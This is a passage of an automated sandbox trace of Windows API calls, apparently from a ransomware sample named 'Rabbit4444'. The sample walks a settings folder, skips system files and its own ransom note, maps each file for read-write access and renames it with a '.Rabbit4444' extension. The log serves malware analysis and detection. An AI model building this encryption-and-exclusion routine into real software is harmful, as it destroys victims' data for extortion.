(in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.159] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14846934588) returned 1 [0057.159] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1239) returned 1 [0057.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0057.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.159] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.161] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.162] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.163] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14847354573) returned 1 [0057.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0057.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.163] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.163] CloseHandle (hObject=0x298) returned 1 [0057.163] CloseHandle (hObject=0x278) returned 1 [0057.163] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms.Rabbit4444") returned 184 [0057.163] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_setformats.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_setformats.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.164] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23fc7c9d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x23fc7c9d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2347ee66, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", cAlternateFileName="AAFF0C~1.SET")) returned 1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2=".") returned 1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2="..") returned 1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2="windows") returned -1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2="boot") returned -1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.164] lstrcmpiW (lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.164] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms") returned="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms" [0057.164] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.165] lstrlenW (lpString="AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms") returned 58 [0057.165] lstrlenW (lpString="Rabbit4444") returned 10 [0057.165] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.165] lstrlenW (lpString=".dll") returned 4 [0057.165] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.165] lstrlenW (lpString=".lnk") returned 4 [0057.165] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.165] lstrlenW (lpString=".ini") returned 4 [0057.165] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.165] lstrlenW (lpString=".sys") returned 4 [0057.165] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.165] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_timezoneinfo.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.165] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.165] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14847585711) returned 1 [0057.165] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1236) returned 1 [0057.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0057.165] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.166] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.167] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.167] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.167] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.167] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.167] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.168] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14847836946) returned 1 [0057.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0057.168] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.168] CloseHandle (hObject=0x298) returned 1 [0057.168] CloseHandle (hObject=0x278) returned 1 [0057.168] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms.Rabbit4444") returned 186 [0057.168] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_timezoneinfo.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_datetime_timezoneinfo.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.169] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24335320, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x24335320, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", cAlternateFileName="AA6049~1.SET")) returned 1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2=".") returned 1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2="..") returned 1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2="windows") returned -1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2="boot") returned -1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.169] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.169] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms") returned="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms" [0057.169] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.169] lstrlenW (lpString="AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms") returned 54 [0057.169] lstrlenW (lpString="Rabbit4444") returned 10 [0057.169] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.169] lstrlenW (lpString=".dll") returned 4 [0057.169] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.170] lstrlenW (lpString=".lnk") returned 4 [0057.170] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.170] lstrlenW (lpString=".ini") returned 4 [0057.170] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.170] lstrlenW (lpString=".sys") returned 4 [0057.170] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.170] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_audio.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.170] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.170] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14848072589) returned 1 [0057.170] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1213) returned 1 [0057.170] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.170] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.170] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x298 [0057.171] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x70000 [0057.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.172] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14848307687) returned 1 [0057.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.172] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.173] CloseHandle (hObject=0x298) returned 1 [0057.173] CloseHandle (hObject=0x278) returned 1 [0057.173] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms.Rabbit4444") returned 182 [0057.173] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_audio.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_audio.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.174] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2448c8a1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2448c8a1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", cAlternateFileName="AA0ACC~1.SET")) returned 1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2=".") returned 1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2="..") returned 1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2="windows") returned -1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2="boot") returned -1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.183] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.183] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms" | out: lpString1="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms") returned="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms" [0057.183] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.184] lstrlenW (lpString="AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms") returned 56 [0057.184] lstrlenW (lpString="Rabbit4444") returned 10 [0057.184] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.184] lstrlenW (lpString=".dll") returned 4 [0057.184] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.184] lstrlenW (lpString=".lnk") returned 4 [0057.184] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.184] lstrlenW (lpString=".ini") returned 4 [0057.184] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.184] lstrlenW (lpString=".sys") returned 4 [0057.184] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.184] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_browser.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.184] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.184] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14849501686) returned 1 [0057.184] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1223) returned 1 [0057.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0057.184] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.186] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.186] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.186] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.186] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.186] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.187] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.187] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.187] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.187] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14849758180) returned 1 [0057.187] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.187] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0057.187] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.187] CloseHandle (hObject=0x298) returned 1 [0057.187] CloseHandle (hObject=0x278) returned 1 [0057.187] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms.Rabbit4444") returned 184 [0057.187] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_browser.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_browser.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.188] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24bb39b4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x24bb39b4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", cAlternateFileName="AA36FF~1.SET")) returned 1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2=".") returned 1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2="..") returned 1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2="windows") returned -1 [0057.188] lstrcmpiW (lpString1="AAA_SystemSettings_DefaultApps_Email.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.188] lstrcmpiW 